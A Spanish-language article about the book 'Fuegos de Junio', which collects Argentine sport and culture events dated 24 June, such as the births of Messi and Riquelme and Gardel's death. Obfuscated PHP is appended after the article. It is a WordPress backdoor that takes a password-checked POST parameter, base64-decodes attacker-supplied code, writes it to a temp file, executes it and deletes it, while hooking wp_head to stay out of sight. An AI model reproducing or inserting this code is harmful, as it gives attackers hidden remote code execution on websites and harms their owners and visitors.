24 de junio, una fecha especial, reflejada en la literatura deportiva

El 24 de junio es una fecha emblemática para el deporte, y la cultura, argentina. En esa fecha, en distintos años, ocurrieron hechos que involucraron a varias figuras populares. El flamante libro Fuegos de Junio reúne a esos sucesos en una lectura ágil que mezcla cuento, crónica y ficción.

Un 24 de junio nacieron Juan Manuel Fangio, Juan Román Riquelme y Lionel Messi; la Selección Argentina ganó su primer Mundial; y siguiendo con las Copas del Mundo, Claudio Caniggia le hizo el recordado gol a Brasil en Italia 90; Maxi Rodriguez anotó el golazo decisivo ante México en Alemania 2006.

También un 24 de junio murieron Carlos Gardel y Rodrigo, cantantes populares que tuvieron su conexión con el fútbol y otros deportes. Y un 24 de junio, Jorge Luis Borges escribió su único cuento mencionando al fútbol, un deporte que siempre cuestionaba y denostaba.

También desfilan por las páginas de este libro Diego Maradona, Patricio Rey, Ernesto Sábato y Osvaldo Zubeldía, protagonistas de hechos trascendentes un 24 de junio.

“Fuegos de Junio gira en torneo a esa fecha específica. Es también el día de la tradicional Fogata de San Juan, que había quedado en desuso pero un poco volvió en los últimos años. La idea surgió a partir de los nacimientos de Riguelme y Messi y después se fueron sumando otros acontecimientos que involucran a personalidades del deporte y la cultura nacionales. El libro se dirige hacia el lado del deporte”, cuenta Juan Stanisci, uno de los ideólogos y autores de Fuegos de Junio.

Stanisci comparte la escritura del texto con Sebastián Chittadini, Lucas Jiménez, Santiago Núñez, Esteban Bedriñan y Lucas Bauzá, integrantes del staff de Lástima a nadie, maestro. Y Gonzalo Lanzilotta, el autor del dibujo de la portada. Milena Caserola es la editorial que publicó el libro.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}